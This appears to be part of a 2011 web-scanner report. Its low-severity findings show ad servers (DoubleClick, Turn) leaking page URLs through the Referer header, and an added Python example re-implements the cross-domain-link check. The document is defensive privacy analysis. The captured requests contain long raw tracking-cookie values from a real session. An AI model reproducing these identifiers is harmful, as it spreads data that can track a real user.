document.write('\n\n\n\n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...
888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/http://ad.doubleclick.net/jump/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=7045426855259476565?">\n<IMG SRC="http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=7045426855259476565?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
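
Added example, not part of the crawler's output and not the code of any scanner: the check behind the "link to another domain" findings in entries 17.76 to 17.86, re-implemented in Python and run over the request URL and response body captured in entry 17.79. It also shows what actually travels in the Referer header to the third-party host, which is the point these Information-level findings are making. The page URL and response body are copied from 17.79; the function names, the audit() result shape and the site_of() last-two-labels heuristic are assumptions of this example.

```python
"""Re-implementation of the 'link to another domain' check used above.

Added example, not the crawler's code. The page URL and response body are
copied from entry 17.79; function names and the site_of() heuristic are
assumptions of this example.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Copied from entry 17.79: the URL the ad script was loaded from. The query
# string is empty (a bare trailing '?'); the targeting values live in
# ';'-delimited matrix parameters inside the path.
PAGE_URL = ("http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/classified"
            ";s1=classified;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=oodle.com"
            ";test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=3232293233741075?")

# Copied from the same entry's response: a document.write() of the ad markup.
RESPONSE_BODY = (
    "document.write('<a target=\"_blank\" href=\"http://ad.doubleclick.net/click;"
    "h=v8/3a9e/0/0/%2a/c;234764637;0-0;0;36776316;3454-728/90;40474377/40492164/1;;"
    "~sscs=%3fhttp://mariacollege.edu/\"><img src=\"http://s0.2mdn.net/viewad/"
    "2362004/Maria_728x90_AAD2-10_40K.jpg\" border=0 "
    "alt=\"Click here to find out more!\"></a>')"
)

# Absolute URLs inside markup or JS strings. The match stops at quotes,
# whitespace, angle brackets and backslashes (escaped quotes in document.write),
# so a click-tracker URL that embeds another URL (...~sscs=%3fhttp://...) is
# reported once, under the host the browser contacts first.
_URL_RE = re.compile(r"https?://[^\s'\"<>\\]+")


def site_of(host: str) -> str:
    """Crude registrable domain: the last two labels (assumption of this
    example; a production check should consult the Public Suffix List)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def has_query_string(url: str) -> bool:
    """The scanner's trigger: a '?' is present, even with nothing after it."""
    return "?" in url.split("#", 1)[0]


def cross_domain_links(page_url: str, body: str) -> list[str]:
    """Every absolute URL in body whose site differs from the page's site.
    Each of these hosts receives the page URL in the Referer header when the
    browser fetches the resource or the user follows the link."""
    page_site = site_of(urlsplit(page_url).hostname or "")
    links: list[str] = []
    for match in _URL_RE.finditer(body):
        url = match.group(0)
        if site_of(urlsplit(url).hostname or "") != page_site and url not in links:
            links.append(url)
    return links


def referer_for(page_url: str) -> str:
    """What a browser of the report's era sends as Referer from page_url:
    scheme, host, port, path and query. Fragment and userinfo are dropped.
    (Today's default Referrer-Policy trims cross-site referers to the origin;
    that did not exist in 2011.)"""
    parts = urlsplit(page_url)
    netloc = parts.hostname or ""
    if parts.port:
        netloc += f":{parts.port}"
    referer = f"{parts.scheme}://{netloc}{parts.path}"
    if has_query_string(page_url):
        referer += "?" + parts.query
    return referer


def leaked_parameters(page_url: str) -> dict[str, str]:
    """Everything a third party can read out of that Referer: the '?' query
    plus the ';key=value' matrix parameters DoubleClick carries in the path."""
    parts = urlsplit(page_url)
    params: dict[str, str] = {}
    for segment in parts.path.split(";")[1:]:
        if segment:                       # ';;' produces an empty segment
            key, _, value = segment.partition("=")
            params[key] = value
    params.update(parse_qsl(parts.query, keep_blank_values=True))
    return params


def audit(page_url: str, body: str) -> dict:
    """One finding in the report's shape: raised only when the page URL has a
    query string AND the response points at another site."""
    links = cross_domain_links(page_url, body) if has_query_string(page_url) else []
    return {
        "reported": bool(links),
        "links": links,
        "referer_sent": referer_for(page_url),
        "exposed": leaked_parameters(page_url),
    }


if __name__ == "__main__":
    result = audit(PAGE_URL, RESPONSE_BODY)
    print("reported:", result["reported"])
    for link in result["links"]:
        print("cross-domain link:", link)
    print("Referer sent to it:", result["referer_sent"])
    for key, value in result["exposed"].items():
        print(f"  exposed {key}={value!r}")
```

Run as a script it prints the 17.79 finding: the cross-domain link is the s0.2mdn.net creative, and the Referer sent when fetching it is the full DoubleClick URL. Two caveats this makes visible: the scanner's trigger is a bare "?", but the values that actually leak in these entries are the ";"-delimited matrix parameters in the path (s1, ref, ord and so on), which travel in the Referer whether or not a query string is present; and the click-through redirect hidden inside the DoubleClick click URL (~sscs=%3fhttp://mariacollege.edu/) is not reported separately, since the browser contacts ad.doubleclick.net first and only then is redirected.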

17.86. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain (see the captured request below). When the browser fetches that resource or the user follows the link, the page URL, query string included, is sent to that domain in the Referer header.

Request

GET /server/ads.js?&pub=8024590&code=12929577&cch=12929478&l=300x250&tmz=-6&area=0&res=1920&rnd=0.03954016091302037&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; adImpCount=a23_XVoqSlKtCC-2lTx1mK8Atn0oO5LfCaNOF46MJQVh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKT4Z56e4E96NaNZjC_AOT217oTThsnNqViHEtNUDKqf-OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELRE
BCeeahn1EC3U97yx8tXGz59qajUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuAOwss-vu9H2Leed6bKEL9Ai4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; 
pf=P2ulGxJH0L6sP7i92CPecgAmiI2Lsig78fIY2fHGbzuJwV9kSIzX4BtZ7vBDkFqiEUMyLdhTUOk0HUHTgKulxX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sun, 30 Jan 2011 22:43:52 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 22:43:52 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 22:43:52 GMT
Content-Length: 8641


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
rn document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n\n\n     \n        \n                \n                            <iframe name="turn_ad_call_frame" width="300" height="250" src="http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=9;w=300;h=250;q=turn" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

17.87. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /server/ads.js?&pub=6264177&code=14383603&cch=14381728&l=300x250&tmz=-6&area=0&res=1920&rnd=0.04441207833588123&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; adImpCount=jD3N2bWA3-mOnaHNbq6oGr6gUOClkrpfUMKANQ1vhXPfaqaDzVRu9ZiuBStYaftYCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rgpegjWK4MWwom9unlgMhLXNsCCEbhAsIdsy3zCFGHpw37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJLf6A30j8d5gU8-mc72wOIKQrupC4PpJl2uCWF8C-Ug5zE4ga4uSsEjChAQfwWw36Y_OeXGaHeEWZpxqUmyoO4aEqzrlzsjMft3cRcjGnFvni7gawmV97meEG2o8pgUTMVUvCEsZdhQvkMaGDNXRUK841wLk2GYSRC0x3BEve4S431p3A6UMJjebe8drcGsyS5Eq2u8SK-4v0nTmoUt_kkk_bc2bQTBpOPgQ2rj-z4cSfohDo4-tul6_WuD8j0eMjE2VTyWMB9aQAFw797l12xcGDwUqNo5bwBfJavyMoCpVVDlIJowEL2ZJ7bbw_gCtmttGfpE3WazmTpUKWPgdm0Kwwwjl5KiXaen7PpuSxadNSxUp_78PaBWAnqowBUtUuPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6aKPrXTIbISjLdU8fmF4gcunvuhdFJQJil2xKmTz50dp7i0E4C4fIPULOO-1bgvNyH-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lAwi3YZykxvivNDVu_wiJ-nzpgcqiBETfVCgh6rOLqPGrJHyerevXy89jQMS63zyiKqQrupC4PpJl2uCWF8C-Ug7zI1PJlsg4JH93UKg4p8Y5067axWP77CNDdpZKPWLlSzacm4a-crF0dpacRlQXSurFgJILRn7aDAZTiRRTDpAMVUvCEsZdhQvkMaGDNXRUKxEQUIAYpp-QbAJrP1iB52HqzZ3gkHjNDLavV-i2IDmnKA5Q2hyGLZzy7yP9IhZH9vIPUpju1It7TH_4ufsTy9mfohDo4-tul6_WuD8j0eMjgn3JqGWHn99L8yAc1t0CrMGDwUqNo5bwBfJavyMoCpW5NWAkI-bj2WEMdrQi7smJSD2PyHt-rGJGOJ3lCDBJu6wwwjl5KiXaen7PpuSxadNrWfCFeAmfYB9wvbNyX_HcPveIf8j2XY661VgXz9vKr9c4SMN31V96MWZ_Nbkosfv4Z9eHEmOCw9cZ5JxzVrlAnvuhdFJQJil2xKmTz50dpwLpSN-3LiOu9Vp7WBoDgFL-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukLgWjDXsTUeTWd5tj4qNaDiJ4nBZ8RXPuIpJnusA91x86GC4mLEfJ2sljTHmzwZbAY_Lh2Ugi8mvJG633sZOiSP-EXc_UXFWP7mPaqhTNB2_pCu6kLg-kmXa4JYXwL5SDkn2PegxRqM5mRRNvuUuPQYa2L50HxvswuEv77HCRTvK8NG6w8lsq_gxT4zTpoxnW4XDDwtPU5vElBnBkAq9aTtVS8ISxl2FC-QxoYM1dFQrRidyFCOVEUccMTneL2wPB2akJ6Zxx4MaHG4qowJX52eEsNCVznntZWR3U7tjmpSZjO1tJ8qK8UAy-VKR7Q8r4Z-iEOjj626Xr9a4PyPR4yOY4aAiwQlqVTaDNmxm60K7wYPBSo2jlvAF8lq_IygKlaFm_ARvcAKoZH-AIv62HmLHlgdVIiUBy9FQ0RyPwh-_rDDCOXkqJdp6fs-m5LFp08ZtWn1dPsjZXR0HI6ZwQiQ-94h_yPZdjrrVWBfP28qvqcQn-qKG1Gb1Z9AhVjY5XByMOV9_koeB1I57EmsQtHqbnNLg8Qx7fq0wYdnvZy7Y32feEuljMvvhciAahuPk0P78DoTX-MltELRE
BCeeahnJarbE4M_xRXSdcI4iMbNNITjgnthAiWrbbf30tKcRFHS__DAzsh0vKgYK4DlknsYsTXzTIe6cvP8Fgp6v0iG1pCu6kLg-kmXa4JYXwL5SDnCxFISzUKJrnz8NWtmYNBgbnCbJPSsHs0iOvX6zYZZ441JwlocRM-1StCCQK60MTAivtkH0XcIkoBkuY7jUSFZVS8ISxl2FC-QxoYM1dFQrFMPrYvz2Ts1Ij_XSz-xv_NWGImt49pAB5RbCmhGeBVfK2_lUCO-ofMYaBVz1MsW3qBtHiSDSYD2cppR2YtGNYJ-iEOjj626Xr9a4PyPR4yPVhnlIkVgFWAUsSjI0os5awYPBSo2jlvAF8lq_IygKlcymYwSoiOeW4YEq5c_wtcPOvPQvhLJNbC2RmtNyUVddQ_F7c57KXIm9M4O-4Hye-wueocyz5z4Zh4_TTFn-uAowvSXZHGSyvtzgTZp8tkHW1Lph5MNqkh8XeX6MytKBTrzG1aXCqxVf5nZAA7HLfYwHFS74pGVX6R7fIB4_ENcKBxUu-KRlV-ke3yAePxDXCgcVLvikZVfpHt8gHj8Q1woHFS74pGVX6R7fIB4_ENcKkJ7WkZl4NM0k2bFXusY9VItRHAs1DGSp43CQgKuilTWLURwLNQxkqeNwkICropU1i1EcCzUMZKnjcJCAq6KVNe4dObEIMtKsHRmogbr3003uHTmxCDLSrB0ZqIG699NN7h05sQgy0qwdGaiBuvfTTe4dObEIMtKsHRmogbr3002Ul8WnhGx-5A8JgMe8wN1plJfFp4RsfuQPCYDHvMDdaTzS0erQLm3C2K0qtVlbCNOT8XToW0yxZ3rNQFHzVErUUFo10m1vdQ1esR0Vej5o2VBaNdJtb3UNXrEdFXo-aNlQWjXSbW91DV6xHRV6PmjZiM7S8Ta6ZVi8L44nt5Lbx_VtNJu5mSi-Do8DnZc8Z5lgZTgyDxl-p9HfhLxfMdBCgGuqQYTxk1W2ZXZk9Fbu2FD6CgQVbZgEbhsoT18Qyzhw7W5j5_klUHK2cIyCgrVuHA0g_1_zvhzGxm5cQYKDYoCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbbQ6QSLK4RiJR_RkawdJ2DWG8nWnpcW2PqfBIM0QT5xSvI67q-6Y9u6ozlXnWk2Vqae3zeygEkfAxz0LdLPYjcint83soBJHwMc9C3Sz2I3IE2wSFrg3YhUxrd13SPf4zdk0py110jTFeWakVDqJkX2L9hnORGvmj8mxjNocqMdc8PVvEcs62kDyw4j4Ti-ngvD1bxHLOtpA8sOI-E4vp4Lw9W8RyzraQPLDiPhOL6eC8PVvEcs62kDyw4j4Ti-ngur7bsp5Fvhi44QSuDqR21RI-fooknOV-tsJXjS2yRhbSPn6KJJzlfrbCV40tskYW0j5-iiSc5X62wleNLbJGFtI-fooknOV-tsJXjS2yRhbPg2v6FqwK2qGH2NT2HwC2T4Nr-hasCtqhh9jU9h8Atk-Da_oWrAraoYfY1PYfALZ9KcqOJj5P-El2YxOi1A-SJzgRA1_Lhfy9FvJaW7uwAuc4EQNfy4X8vRbyWlu7sALnOBEDX8uF_L0W8lpbu7ACykgbtzLVWjLpGASKeaSS94; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; 
pf=DDphSjcGk-rcs3g8uiJ3tdVnoSLgvd8DzizssL9FyFKJwV9kSIzX4BtZ7vBDkFqigSFYvDNduS7kxw0buCFgeX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:55:09 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=Q2BDGLjfiARZbN8b3TXoKCNCtKIL-r9iDqITQDnnSsaY481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOaoxd_oldZyM_0h2lwQ2vV-oPWvpR2lvg2CTziw80-4eo8F9xA-g6RuoYQKpeVv73XLQkHE3nbfiVxApQ1oZYbmX9ZeDk-Z9Mb4drqyLE7KPtnmkfeQoFbVixLdk5YAN4PGnMoZ0x3TQuKe2B1edDEU6sFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK0